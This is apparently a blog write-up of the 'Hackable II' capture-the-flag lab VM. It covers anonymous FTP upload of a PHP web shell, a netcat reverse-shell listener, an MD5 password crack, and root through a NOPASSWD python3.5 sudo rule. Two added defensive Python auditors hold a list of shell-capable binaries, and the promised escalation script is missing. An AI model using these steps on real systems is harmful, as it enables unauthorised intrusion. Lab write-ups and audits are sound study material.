Monday, July 26, 2021
CaptureTheFlag - Hackable II
sudo nmap 10.38.1.1/24
Nmap scan report for 10.38.1.7
Host is up (0.00036s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:B5:56:29 (Oracle VirtualBox virtual NIC)
Hmmm... ftp, ssh, and a web server... The web server has the default apache2 site, which doesn't reveal anything too interesting... Apache2 Ubuntu Default Page... Nothing too extraordinary. So, back to nmap:
sudo nmap --script http-enum.nse 10.38.1.7
This revealed a folder named /files/ on the web server. So, I look at it in a web browser and see a file listing. So I attempt an anonymous ftp to the server, and, sure enough, it's the same folder listing. Could they have allowed anonymous uploads? I have a short text file, temp.txt, for just such tests...
put temp.txt
Success! And, if I refresh the web browser, the file shows up. So, I delete that file, and upload a php web shell, which points to my kali box:
put shell.php
And on my kali box:
nc -nlvp 1234
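The chain above works because anonymous FTP can write into the same directory Apache serves. As an added example (not from the original post, and not the box's real configuration), this audit parses a vsftpd.conf and reports that overlap; the sample configs and the assumed web roots are constructed, and absent keys fall back to vsftpd's compiled-in defaults, which is why a stripped-down config with no anonymous_enable line is still flagged.

```python
# vsftpd compiled-in defaults from vsftpd.conf(5): an absent key falls back
# to these, so anonymous logins are ON unless the config says otherwise.
DEFAULTS = {"anonymous_enable": "YES", "write_enable": "NO",
            "anon_upload_enable": "NO"}

# Assumed Apache document roots; adjust to the host being audited.
WEB_ROOTS = ("/var/www/", "/srv/www/")
# Constructed configs: the weak one mirrors the setup found on this box.
WEAK_VSFTPD_CONF = """\
anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_root=/var/www/html/files
"""
HARDENED_VSFTPD_CONF = """\
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
"""


def parse_vsftpd(text):
    # key=value lines over the defaults; comments and blanks are skipped
    conf = dict(DEFAULTS)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        conf[key.strip().lower()] = value.strip()
    return conf


def is_yes(conf, key):
    return conf.get(key, "NO").upper() == "YES"


def audit_vsftpd(text, web_roots=WEB_ROOTS):
    """Return findings describing an anonymous-upload / web-root overlap."""
    conf = parse_vsftpd(text)
    findings = []
    anon_upload = (is_yes(conf, "anonymous_enable") and is_yes(conf, "write_enable")
                   and is_yes(conf, "anon_upload_enable"))
    if anon_upload:
        findings.append("anonymous FTP upload is enabled")
    anon_root = conf.get("anon_root", "")
    in_web_root = any(anon_root.startswith(r) for r in web_roots)
    if in_web_root:
        findings.append("anon_root %s lies inside a web root" % anon_root)
    if anon_upload and in_web_root:
        findings.append("anonymous users can write into a web-served directory")
    return findings
```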
And then I refresh the page in Firefox and switch back to my netcat session and check to see what users are on this box... Interesting...
$ cd /home
$ ls -lta
total 16
drwxr-xr-x 4 shrek shrek 4096 Jul 26 21:13 shrek
drwxr-xr-x 23 root root 4096 Nov 26 2020 ..
drwxr-xr-x 3 root root 4096 Nov 26 2020 .
-rw-r--r-- 1 root root 43 Nov 26 2020 important.txt
One user, shrek, and hmmm...
$ cat important.txt
run the script to see the data
/.runme.sh
Yeah... Not gonna run that... But...
$ cat /.runme.sh
#!/bin/bash
echo 'the secret key'
sleep 2
echo 'is'
sleep 2
echo 'trolled'
sleep 2
echo 'restarting computer in 3 seconds...'
sleep 1
echo 'restarting computer in 2 seconds...'
sleep 1
echo 'restarting computer in 1 seconds...'
sleep 1
echo '⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀
⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀
⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆
⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆
⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆
⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿
⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉
⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇
⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
shrek:cf4c2232354952690368f1b3dfdfb24d'
So, off to https://crackstation.net/ and the password for shrek is, apparently, onion. This was also the title of the file listing page in the web browser. Clever clue ;) So... Kill the reverse shell and log in via ssh and see what we can do with sudo...
$ ssh shrek@10.38.1.7
shrek@10.38.1.7's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-194-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
88 packages can be updated.
68 updates are security updates.
Last login: Mon Jul 26 21:09:32 2021 from 10.38.1.4
shrek@ubuntu:~$ sudo -l
Matching Defaults entries for shrek on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shrek may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/python3.5
Wait! What?! /usr/bin/python3.5 can be executed as root with no password?! Here's a quick and dirty sh.py:
root@ubuntu:~# cd /root
root@ubuntu:/root# ls -lta
total 32
-rw-------  1 root root   13 Jun 15 16:01 .bash_history
drw-------  4 root root 4096 Jun 15 13:35 .
-rw-------  1 root root 1581 Jun 15 13:28 root.txt
drwxr-xr-x 23 root root 4096 Nov 26  2020 ..
drw-------  2 root root 4096 Nov 25  2020 .cache
drw-------  2 root root 4096 Nov 25  2020 .nano
-rw-------  1 root root 3106 Oct 22  2015 .bashrc
-rw-------  1 root root  148 Aug 17  2015 .profile
root@ubuntu:/root# cat root.txt
                            ____
        ____....----''''````    |.
,'''````            ____....----; '.
| __....----''''````         .-.`'. '.
|.-.                .....    | |   '. '.
`| |        ..:::::::::::::::| |   .-;. |
 | |`'-;-::::::::::::::::::::| |,,.| |-='
 | |   | ::::::::::::::::::::| |   | |
 | |   | :::::::::::::::;;;;;| |   | |
 | |   | :::::::::;;;2KY2KY2Y| |   | |
 | |   | :::::;;Y2KY2KY2KY2KY| |   | |
 | |   | :::;Y2Y2KY2KY2KY2KY2| |   | |
 | |   | :;Y2KY2KY2KY2KY2K+++| |   | |
 | |   | |;2KY2KY2KY2++++++++| |   | |
 | |   | | ;++++++++++++++++;| |   | |
 | |   | |  ;++++++++++++++;.| |   | |
 | |   | |   :++++++++++++:  | |   | |
 | |   | |    .:++++++++;.   | |   | |
 | |   | |       .:;+:..     | |   | |
 | |   | |         ;;        | |   | |
 | |   | |      .,:+;:,.     | |   | |
 | |   | |    .::::;+::::,   | |   | |
 | |   | |   ::::::;;::::::. | |   | |
 | |   | |  :::::::+;:::::::.| |   | |
 | |   | | ::::::::;;::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | ::::::::;+++;:::::::| |   | |
 | |   | :::::::;+++++;::::::| |   | |
 | |   | ::::::;+++++++;:::::| |   | |
 | |   |.:::::;+++++++++;::::| |   | |
 | | ,`':::::;+++++++++++;:::| |'"-| |-..
 | |'   ::::;+++++++++++++;::| |   '-' ,|
 | |    ::::;++++++++++++++;:| |     .' |
,;-'_   `-._===++++++++++_.-'| |   .'  .'
|    ````'''----....___-'    '-' .'  .'
'---....____           ````'''--;  ,'
            ````''''----....____|.'
invite-me: https://www.linkedin.com/in/eliastouguinho/
And there it is! It took me longer to write this up than to get the root flag on this box. Next time, maybe something a little harder? ;)
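The sudo -l result on this box ((root) NOPASSWD: /usr/bin/python3.5) is the kind of rule a defender should be auditing for before anyone else finds it. Here is an added example, not part of the original post, that parses sudo -l output into individual rules and flags any that run a shell-capable interpreter or editor as root; the sample output and the list of binaries are constructed assumptions (the python3.5 line mirrors this box, the other rules are invented to exercise the parser).

```python
import os
import re

# Constructed sample in the shape of `sudo -l` output (added example, not
# the original post's output): one real-looking finding plus two extra
# rules so the parser has something benign and something comma-separated.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shrek on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User shrek may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/python3.5
    (root) /usr/bin/apt-get update
    (ALL) NOPASSWD: /usr/bin/vim, /usr/bin/systemctl restart vsftpd
"""

# Program families that can hand back an interactive shell or an arbitrary
# file write when run as root; a sudo rule on one of these is in practice
# unrestricted root. Assumed starting list, extend for your environment.
SHELL_CAPABLE = re.compile(
    r"^(python[0-9.]*|perl|ruby|bash|sh|dash|vim?|nano|less|more|awk|find|env)$")
# One rule line: "(runas) [TAG: ...] cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return (runas, nopasswd, command) for every command in sudo -l output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True  # rule lines follow; Defaults lines are skipped
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",") if c.strip()):
            rules.append((m.group("runas").strip(), nopasswd, cmd))
    return rules


def audit_sudo_l(text):
    """Return (command, auth) pairs that give root a shell-capable binary."""
    risky = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        binary = os.path.basename(cmd.split()[0])
        if runas in ("root", "ALL") and SHELL_CAPABLE.match(binary):
            risky.append((cmd, "NOPASSWD" if nopasswd else "password"))
    return risky
```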
